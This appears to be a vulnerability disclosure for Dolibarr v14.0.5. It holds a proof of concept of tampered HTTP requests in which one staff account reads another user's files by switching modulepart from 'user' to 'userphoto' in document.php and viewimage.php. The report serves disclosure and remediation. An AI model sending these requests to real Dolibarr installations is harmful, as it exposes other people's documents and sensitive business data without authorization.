Description

Dolibarr v14.0.5 allows improper access control issues in the userphoto modulepart. The impact could lead to data exposure as the attached files and documents may contain sensitive information of relevant parties such as contacts, suppliers, invoices, orders, stocks, agenda, accounting and more.

Proof of Concept

**** Scenario: Staff_2 is trying to request property of Staff_3

Tampered Request: in modulepart=user 
GET /dolibarr/document.php?modulepart=user&entity=1&file=3/fileuser3.txt HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}

Expected Response:
Access denied. You try to access to a page, area or feature of a disabled module or without being in an authenticated session or that is not allowed to your user. 
Current login: staff_2 
Permission for this login can be defined by your Dolibarr administrator from menu Home->Users.

<SNIP><SNIP>

Tampered Request: using modulepart=userphoto
GET /dolibarr/document.php?modulepart=userphoto&attachment=0&file=3/fileuser3.txt&entity=1 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}

Tampered Response:
**Staff 3 file content return**

<SNIP><SNIP>

Tampered Request: using modulepart=userphoto
GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=3/fileuser3.txt&cache=0 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}

Tampered Response:
**Staff 3 file content return**

Impact

This vulnerability is capable of downloading or reading any file types such as pdf, zip, txt, jpg and more thus leading to sensitive information exposure of relevant parties.